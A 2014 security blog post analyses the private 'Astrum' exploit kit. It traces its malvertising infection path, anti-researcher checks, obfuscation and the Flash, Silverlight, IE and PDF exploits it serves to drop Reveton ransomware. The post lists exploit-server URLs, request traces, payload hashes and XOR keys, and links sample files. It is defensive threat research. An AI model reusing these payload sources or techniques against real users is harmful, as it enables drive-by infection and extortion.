2014-09-14 - Study
Say Hello to Astrum EK
 |
| Artist’s impression shows the structure of the Milky Way NASA/JPL-Caltech/ESO/R. Hurt |
I was chasing something else (the Kovter adfraud's Sweet Orange thread - Kovter is not a ransomware anymore (since at least march 2014)) when I received bullets from an undocumented "weapon" : an exploit kit that seems to be private (for now?) and based on the infection path (between an Adxpansion badvert on a porn website and the https goo.gl link to the landing ) in use by a group that was traffing to Reveton team's EK threads (so via Cool then Angler EK) :
Say Hello to Astrum EK
 |
| Astrum EK 2014-09-06 - Real Name (not chosen) (Fast looking at the URI pattern we may find it a little Angler-ish...but it's not) |
Astrum will accept to serve a landing only once per IP and is also denying connection from Tor and (at least) Russia.
The lifetime of the landing seems a little higher than on Angler or Nuclear Pack but where most of the time you need to fake some referer to avoid being rejected, with Astrum : show a referer and you'll get ignored and IP banned. Firefox, Chrome and Opera are also ignored (and i guess that they are filtered out upstream anyway).
A fast search lets think it's in use since at least 2014-08-15
A fast search lets think it's in use since at least 2014-08-15
Now let's take a look at the bullets and the ballistic.
CVE-2014-0515 - CVE-2013-0634 (Flash) :
Those days it's the most successful vuln targeted in exploit kits, followed by CVE-2013-2551.
 |
| CVE-2014-0515 successful path in Astrum EK 2014-09-06 |
GET http://static.yarkiy-mir .org/duf5ibqshp.html
200 OK (text/html)
 |
| Piece of Astrum's Landing 2014-09-06 http://pastebin.com/Jc5k0kvi JsBeautified : http://pastebin.com/gvjskkG2 |
Obfuscation in used as described by EKWatcher
An array of modifed-Base64 strings, that are each XORed with a different byte and then inserted (in random order) into the JS later - The Base64 is using "A-Za-z0-9-:" instead of "A-Za-z0-9+/"
After deobfuscating the "div" value via the function t (using malzilla for instance) we get this :
An array of modifed-Base64 strings, that are each XORed with a different byte and then inserted (in random order) into the JS later - The Base64 is using "A-Za-z0-9-:" instead of "A-Za-z0-9+/"
After deobfuscating the "div" value via the function t (using malzilla for instance) we get this :
There are sweet piece of code like those showing they had researcher/bots etc in mind while writing it :
 |
| On landing load, script will try to catch debugging tools (even phantom....) |
 |
| and also check via loadXML if there are obvious researcher tools launched or if it's running in a VM. |
 |
| check for Kaspersky BHO |
And here is the data that will be posted :
 |
| Fast sum-up of the data that will be encoded and posted in next call. Comment are obviously not in the original code |
POST http://static.yarkiy-mir .org/IVmTAccT_rdKYvlrrCSb3UJl-G-gc5uJSzOmaP8jldlPMKNo_iuSh1J_qjr5Ot7fTg..
200 OK (text/html) CVE-2013-2551 and creation of the flash object.
Posted data (as Neutrino was doing) :
Which before encoding should look like :
 |
| Data sent to the Exploit kit on second call |
 |
| Astrum - 2014-09-06 Piece of the Post Call reply. |
The obfuscation in use is the same as in the landing.
Once decoded here is the Flash insertion :
 |
| Astrum - Inserting the flash element. http://pastebin.com/GYehkmaC |
GET http://static.yarkiy-mir .org/kZThMKU15rv6r4tazgKD0fKoil7CVYOF-_7UWZ0FjdX__dFZnA2Ki-Ky2AWYHMbT_g..
200 OK (application/x-shockwave-flash) 3fb2c3750d51268781fa608a42c3e4d7 CVE-2014-0515 & CVE-2013-0634 (Thanks to Arseny Levin (Spiderlabs) for the help)
GET http://static.yarkiy-mir .org/CjJXSImjvethCT0i4pTYgWkOPCbuw9jVYFhiIbGT1oVkW2chsJvR23kUbn27ip2DZQ..
200 OK (application/octet-stream) Once Decoded: 9d9eb3ceffd6596ebdf7fc9387cd5cb1 - Reveton
 |
| Xored Payload. Key : 98EB68248A2815474CFE8902C0603770 |
 |
| Astrum EK - 2014-09-06 Silverlight Successful path |
GET http://asset.yur88 .com/xawufyinv3lqr.html
200 OK (text/html)
 |
| To give an idea of the data being sent to the Exploit Kit on the following post request. (md5 is different) |
POST http://asset.yur88 .com/xcC2oZh5Lpbyq4bPox1Hq_uv3M-oGkXzoa_Vy_IaEvr4_IyZokFE_Lbmj5qmUA7-qg..
200 OK (text/html)
The silverlight call, once decoded :
 |
| Astrum - 2014-09-06 Piece of the Post Call reply launching Silverligt and CVE-2013-2551 attack |
 |
| Astrum : Post reply silverlight call once decoded 2014-09-06 http://pastebin.com/enPjFN96 |
GET http://asset.yur88 .com/06RCA_viDC7kz3JtwIZlE-3LKG3LgWdLt8shaZGBMELumHg7wdpmRKCCeD_AyyxGvA..
200 OK (application/x-silverlight-app) 3b82c622a343317d14161206aa9f2fce
 |
| Silverlight Exploit |
sl.dll : e332a8d62288b80f939fff7d50ac33d3
GET http://asset.yur88 .com/sKJTobP38yWHyWPPiJOaGI7NOc-DlJhA1M0wy9mUz0mNnmmZic-ZT8OEaZ2L3tNN3w..
200 OK (application/octet-stream) 9d9eb3ceffd6596ebdf7fc9387cd5cb1 Reveton again
Xor key : BFAD0475157E8E15F72903B5E80649B2
Xor key : BFAD0475157E8E15F72903B5E80649B2
CVE-2013-2551 :
 |
| CVE-2013-2551 successfully fired by Astrum EK 2014-09-11 |
GET http://img.gestionartepyme .com.ar/omhq1t4pjx3fac.html
200 OK (text/html)
POST http://img.gestionartepyme .com.ar/C1BzyerkwKg1aE_30oT_kDU9S6TYgfyXZj0SqIGFqsUzbEzzgNv8w3h2SvLUzeDAZA..
200 OK (text/html)
After a first pass of decoding :
 |
| Piece of CVE-2013-2551 after first decoding pass. http://pastebin.com/g847kaSX |
GET http://img.gestionartepyme .com.ar/Wi-S--HJ20lkF67F2ankcWRCqpbTrOd2N0LzmoqosSRiE63Bi_bnIikJq87f4PshNQ..
200 OK (application/octet-stream) a668806b4be0e3b02e3adf0130b70bd0 once decoded (reveton)
Xor Key: 3FF52A9A6B4C3E3DE93AD7183C0DFFA6
 |
| Payload written in %temp%\tmp1.log |
If lock screen is activated you'll get for instance in the us :
 |
| Reveton - Screen locked - 2014-09-11 US. |
CVE-2014-0322 :
I'll update if i get a successful pass.
GET http://img.gestionartepyme .com.ar/zy6qjw78b3f4vus.html
200 OK (text/html)
POST http://img.gestionartepyme .com.ar/Nly0S9lDj4daNYQm6nfh71U1jCjjc-buCzLSc-Uht-8IbI935Hm07UV6jXDnaq_vWQ..
200 OK (text/html)
I won't put the decoded one ;)
CVE-2010-0188 :
GET http://assets.dance .com.ar/oljm3dz7pnh.html
200 OK (text/html)
For some reason I couldn't get that one working properly.  |
| CVE-2014-0322 fired by Astrum But unsuccessful. |
GET http://img.gestionartepyme .com.ar/zy6qjw78b3f4vus.html
200 OK (text/html)
 |
| Posted data after the landing, whispering the server to try CVE-2014-0322 - (md5 is different) |
POST http://img.gestionartepyme .com.ar/Nly0S9lDj4daNYQm6nfh71U1jCjjc-buCzLSc-Uht-8IbI935Hm07UV6jXDnaq_vWQ..
200 OK (text/html)
 |
| Obfuscated piece of code to trigger CVE-2014-0322 Astrum 2014-09-11 |
 |
| Piece of the B64 encoded shellcode |
CVE-2010-0188 :
 |
| Astrum firing CVE-2010-0188 (and Flash exploit also) 2014-09-11 |
GET http://assets.dance .com.ar/oljm3dz7pnh.html
200 OK (text/html)
 |
| Decoded posted data |
POST http://assets.dance .com.ar/ZQc75hcLl-kOZATbKD-u1VpjA4kiO6-GDjgG2itsr4ZcOgeMKzOohBYhAt0pIreBCg..
200 OK (text/html)
200 OK (text/html)
 |
| Encoded part of the Post reply in charge of the call for CVE-2010-0188 Astrum - 2014-09-11 |
Once decoded :
 |
| Iframe called for CVE-2010-0188 |
GET http://assets.dance .com.ar/FCNKh1wkpvl_QHW6YxCfxStHcuhpFJ6Wfxx3u2BDnpYtHnbtYByZlGcFcLtiDYaRew..
200 OK (text/html)
 |
| Obfuscated : creation of the PDF object |
 |
| Deobfuscated call for PDF |
GET http://assets.dance .com.ar/4RkrZSI07MGKehRYHQDV_d59EwoXBNSuiiYWWR5T1K7YJBcPHgzTrJI_ElAfHcypjg..200 OK (application/x-shockwave-flash) (CVE-2013-0634/2014-0515)
GET http://assets.dance .com.ar/DQT9jPZKYcJmZ8KxyX5Y_jJgxePDelmtZjvAsMotWa00OcHmynJer34ix7DJY0GqYg..
200 OK (application/pdf) CVE-2010-0188 a3aa7a4499e7b89768ee82ea5c3c8b4a
We have the same kind of obfuscation here that in the landing and post response.
 |
| Object in the PDF containing the Encoded data |
 |
| Piece of js in charge of deobuscating and triggering the exploit |
GET http://assets.dance .com.ar/jnK3hV3Yt6HlEYi4YuyOnbEWj-po6I_O5U2KuWG_j863T4vvYeCIzP1UjrBv8ZfJ4Q..
200 OK (application/octet-stream)
GET http://assets.dance .com.ar/DqVkvx0HOxZlxluCIjMCKjHBXNAoNwN5ZZpZgyFgA3k3mFjVIT8Ee32DXoMhLht-YQ..
200 OK (application/octet-stream) Decoded : 154a5d50ee032dc32e4c64ecbde0eaa1 Reveton
Note that both payload (flash and PDF) in that pass have same Xor key ( 919DCE47A3DBD2518B2F1088604AE0DA )
No Java ?
This exploit kit had some java few weeks ago (CVE-2012-0507, CVE-2013-2460, CVE-2013-2465 - if you make a search on this IP in your log you might figure it ) but it seems java is not exploited anymore.
As I assumed for Flash EK, it's a trade of a now small percentage of infection for more stealth ( >> infection chain last longer >> less rebuild).
The exploitation Graph should be something like :
 |
Astrum EK - Exploitation graph assumption 2014-09-14 |
Files :
AstrumEK_2014-09-14.zip (Owncloud)
PS: If you have some telemetry on this IP : 107.150.24.107 I would be really interested in the numbers. Seeing the infection path, I think traffic should be quite big.